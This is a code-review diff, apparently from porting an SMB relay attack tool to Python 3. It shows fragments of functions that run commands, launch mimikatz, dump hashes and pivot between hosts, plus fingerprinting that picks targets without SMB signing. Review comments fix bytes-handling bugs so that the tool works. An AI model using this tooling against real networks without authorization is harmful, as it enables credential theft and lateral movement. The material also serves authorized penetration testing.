data,s,Output = ReadAndDelete(f, LogFile, data, s) data,s,Output = ReadAndDelete(f, LogFile, data, s)
print Output print (Output)
data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host) data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host)
Logs.info('Command executed:') Logs.info('Command executed:')
@ -1932,7 +1932,7 @@ def RunAsCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName)
except: except:
data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host) data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host)
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong, try something else." print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
##########MimiKatz RPC############# ##########MimiKatz RPC#############
@ -1961,7 +1961,7 @@ def InstallMimiKatz(data, s, clientIP, Username, Domain, Command, Logs, Host, Fi
except: except:
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong, try something else." print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
def RunMimiCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName): def RunMimiCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName):
@ -1990,7 +1990,7 @@ def RunMimiCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileNam
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
except: except:
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong while calling mimikatz. Maybe it's a 32bits system? Try mimi32." print ("[+] Something went wrong while calling mimikatz. Maybe it's a 32bits system? Try mimi32.")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
##########Pivot############# ##########Pivot#############
@ -2017,7 +2017,7 @@ def PivotToOtherHost(data, s, clientIP, Username, Domain, Logs, Host, RunAsPath,
except: except:
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong, try something else." print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
##########VerifyPivot############# ##########VerifyPivot#############
@ -2049,7 +2049,7 @@ def VerifyPivot(data, s, clientIP, Username, Domain, Pivot, Logs, Host, RunAsPat
except: except:
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong, try something else." print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
##########DoSomethingDumb############# ##########DoSomethingDumb#############


@ -388,20 +388,20 @@ class SMBSessionSetupAndxAUTH(Packet):
SecurityBlobLen = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"]) SecurityBlobLen = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"])
NTLMData = str(self.fields["Data"]) NTLMData = str(self.fields["Data"])
###### ASN Stuff ###### ASN Stuff
if len(NTLMData) > 255: if len(NTLMData) > 255:
self.fields["ApplicationHeaderTagLenOfLen"] = "\x82" self.fields["ApplicationHeaderTagLenOfLen"] = "\x82"
self.fields["ApplicationHeaderLen"] = struct.pack(">H", len(SecurityBlobLen)-0) self.fields["ApplicationHeaderLen"] = struct.pack(">H", len(SecurityBlobLen)-0)
else: else:
self.fields["ApplicationHeaderTagLenOfLen"] = "\x81" self.fields["ApplicationHeaderTagLenOfLen"] = "\x81"
self.fields["ApplicationHeaderLen"] = struct.pack(">B", len(SecurityBlobLen)-3) self.fields["ApplicationHeaderLen"] = struct.pack(">B", len(SecurityBlobLen)-3)
if len(NTLMData)-8 > 255: if len(NTLMData)-8 > 255:
self.fields["AsnSecMechLenOfLen"] = "\x82" self.fields["AsnSecMechLenOfLen"] = "\x82"
self.fields["AsnSecMechLen"] = struct.pack(">H", len(SecurityBlobLen)-4) self.fields["AsnSecMechLen"] = struct.pack(">H", len(SecurityBlobLen)-4)
else: else:
self.fields["AsnSecMechLenOfLen"] = "\x81" self.fields["AsnSecMechLenOfLen"] = "\x81"
self.fields["AsnSecMechLen"] = struct.pack(">B", len(SecurityBlobLen)-6) self.fields["AsnSecMechLen"] = struct.pack(">B", len(SecurityBlobLen)-6)
if len(NTLMData)-12 > 255: if len(NTLMData)-12 > 255:
self.fields["ChoosedTagLenOfLen"] = "\x82" self.fields["ChoosedTagLenOfLen"] = "\x82"
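Review bot: The new side still builds `SecurityBlobLen` and `NTLMData` with `str(self.fields[...])` and assigns the ASN.1 length-of-length markers as text literals (`"\x82"`, `"\x81"`), which does not survive the Python 3 port if the packet fields now hold bytes: `str(b"...")` yields the `b'...'` repr, so `len(SecurityBlobLen)` and `len(NTLMData)` no longer measure the payload and the `ApplicationHeaderLen` / `AsnSecMechLen` bytes are computed from the wrong size, while a `str` marker cannot be joined with `bytes` when the packet is serialized. A peer that validates the SPNEGO/GSS-API lengths would presumably reject the session setup, so the relay fails before authentication even starts. I would switch these to byte operations, e.g. `NTLMData = bytes(self.fields["Data"])`, build `SecurityBlobLen` with `b"".join(bytes(self.fields[k]) for k in (...))`, and write the markers as `b"\x82"` / `b"\x81"` (the same applies to the `ChoosedTag*` branches below the hunk). The enclosing method of `SMBSessionSetupAndxAUTH` starts before the hunk and its tail (the remaining length fields) lies after it.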


@ -126,7 +126,7 @@ class SMBNegoDataLanMan(Packet):
##################### #####################
def color(txt, code = 1, modifier = 0): def color(txt, code = 1, modifier = 0):
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt) return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
def IsSigningEnabled(data): def IsSigningEnabled(data):
if data[39] == "\x0f": if data[39] == "\x0f":
@ -141,27 +141,27 @@ def dtoa(d):
return inet_ntoa(struct.pack("!L", d)) return inet_ntoa(struct.pack("!L", d))
def OsNameClientVersion(data): def OsNameClientVersion(data):
try: try:
length = struct.unpack('<H',data[43:45])[0] length = struct.unpack('<H',data[43:45])[0]
if length > 255: if length > 255:
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[48+length:].split('\x00\x00\x00')[:2]]) OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[48+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion return OsVersion, ClientVersion
if length <= 255: if length <= 255:
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]]) OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion return OsVersion, ClientVersion
except: except:
return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version" return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
def GetHostnameAndDomainName(data): def GetHostnameAndDomainName(data):
try: try:
DomainJoined, Hostname = tuple([e.replace('\x00','') for e in data[81:].split('\x00\x00\x00')[:2]]) DomainJoined, Hostname = tuple([e.replace('\x00','') for e in data[81:].split('\x00\x00\x00')[:2]])
#If max length domain name, there won't be a \x00\x00\x00 delineator to split on #If max length domain name, there won't be a \x00\x00\x00 delineator to split on
if Hostname == '': if Hostname == '':
DomainJoined = data[81:110].replace('\x00','') DomainJoined = data[81:110].replace('\x00','')
Hostname = data[113:].replace('\x00','') Hostname = data[113:].replace('\x00','')
return Hostname, DomainJoined return Hostname, DomainJoined
except: except:
return "Could not get Hostname.", "Could not get Domain joined" return "Could not get Hostname.", "Could not get Domain joined"
def DomainGrab(Host): def DomainGrab(Host):
s = socket(AF_INET, SOCK_STREAM) s = socket(AF_INET, SOCK_STREAM)
@ -169,7 +169,7 @@ def DomainGrab(Host):
s.settimeout(Timeout) s.settimeout(Timeout)
s.connect(Host) s.connect(Host)
except: except:
print "Host down or port close, skipping" print ("Host down or port close, skipping")
pass pass
try: try:
h = SMBHeaderLanMan(cmd="\x72",mid="\x01\x00",flag1="\x00", flag2="\x00\x00") h = SMBHeaderLanMan(cmd="\x72",mid="\x01\x00",flag1="\x00", flag2="\x00\x00")
@ -191,7 +191,7 @@ def SmbFinger(Host):
s.settimeout(Timeout) s.settimeout(Timeout)
s.connect(Host) s.connect(Host)
except: except:
print "Host down or port close, skipping" print ("Host down or port close, skipping")
pass pass
try: try:
h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8") h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
@ -252,10 +252,10 @@ def ShowResults(Host):
Signing, OsVer, LanManClient = SmbFinger(Host) Signing, OsVer, LanManClient = SmbFinger(Host)
enabled = color("SMB signing is mandatory. Choose another target", 1, 1) enabled = color("SMB signing is mandatory. Choose another target", 1, 1)
disabled = color("SMB signing: False", 2, 1) disabled = color("SMB signing: False", 2, 1)
print color("Retrieving information for %s..."%Host[0], 8, 1) print (color("Retrieving information for %s..."%Host[0], 8, 1))
print enabled if Signing else disabled print (enabled if Signing else disabled)
print color("Os version: '%s'"%(OsVer), 8, 3) print (color("Os version: '%s'"%(OsVer), 8, 3))
print color("Hostname: '%s'\nPart of the '%s' domain"%(Hostname, DomainJoined), 8, 3) print (color("Hostname: '%s'\nPart of the '%s' domain"%(Hostname, DomainJoined), 8, 3))
except: except:
pass pass
@ -288,7 +288,7 @@ def ShowScanSmallResults(Host):
Hostname, DomainJoined = DomainGrab(Host) Hostname, DomainJoined = DomainGrab(Host)
Signing, OsVer, LanManClient = SmbFinger(Host) Signing, OsVer, LanManClient = SmbFinger(Host)
Message ="['%s', Os:'%s', Domain:'%s', Signing:'%s']"%(Host[0], OsVer, DomainJoined, Signing) Message ="['%s', Os:'%s', Domain:'%s', Signing:'%s']"%(Host[0], OsVer, DomainJoined, Signing)
print Message print (Message)
except: except:
pass pass
@ -299,13 +299,13 @@ def ShowSigning(Host):
s.settimeout(Timeout) s.settimeout(Timeout)
s.connect((Host, 445)) s.connect((Host, 445))
except: except:
print "[Pivot Verification Failed]: Target host is down" print ("[Pivot Verification Failed]: Target host is down" )
return True return True
try: try:
Signing = SmbFingerSigning(Host) Signing = SmbFingerSigning(Host)
if Signing == True: if Signing == True:
print "[Pivot Verification Failed]:Signing is enabled. Choose another host." print ("[Pivot Verification Failed]:Signing is enabled. Choose another host.")
return True return True
else: else:
return False return False
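Review bot: The signing check in `IsSigningEnabled` (`if data[39] == "\x0f":`, context of the first hunk) breaks under Python 3 if `data` is the `bytes` returned by `recv()`: indexing `bytes` gives an `int`, so the comparison with the text literal `"\x0f"` is always False and whichever branch it guards never runs, which makes the "SMB signing is mandatory" gate in `ShowResults` and `ShowSigning` unreliable; use a slice against a bytes literal, `if data[39:40] == b"\x0f":`. The same class of bug sits in `OsNameClientVersion` and `GetHostnameAndDomainName`, where `.split('\x00\x00\x00')` and `.replace('\x00','')` on bytes raise `TypeError` that the bare `except:` swallows, so fingerprinting silently reports "Could not fingerprint" on every host; the literals need to be `b'\x00\x00\x00'` / `b'\x00'` and the results decoded before they are formatted into the `color(...)` messages. The bare `except:` clauses should also be narrowed so a genuine port bug is not hidden behind the "could not fingerprint" fallback. The function bodies of `IsSigningEnabled` and `DomainGrab` run past the hunk edges, so I have not seen what the comparison's branches return.
```python
def OsNameClientVersion(data):
    # Assumes `data` is the raw bytes from recv() — TODO confirm at the caller.
    try:
        length = struct.unpack('<H', data[43:45])[0]
        offset = 48 if length > 255 else 47
        OsVersion, ClientVersion = [
            e.replace(b'\x00', b'').decode('latin-1')
            for e in data[offset + length:].split(b'\x00\x00\x00')[:2]
        ]
        return OsVersion, ClientVersion
    except (struct.error, ValueError, IndexError):
        return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
# … unchanged: GetHostnameAndDomainName needs the same b'' literals and decode …
```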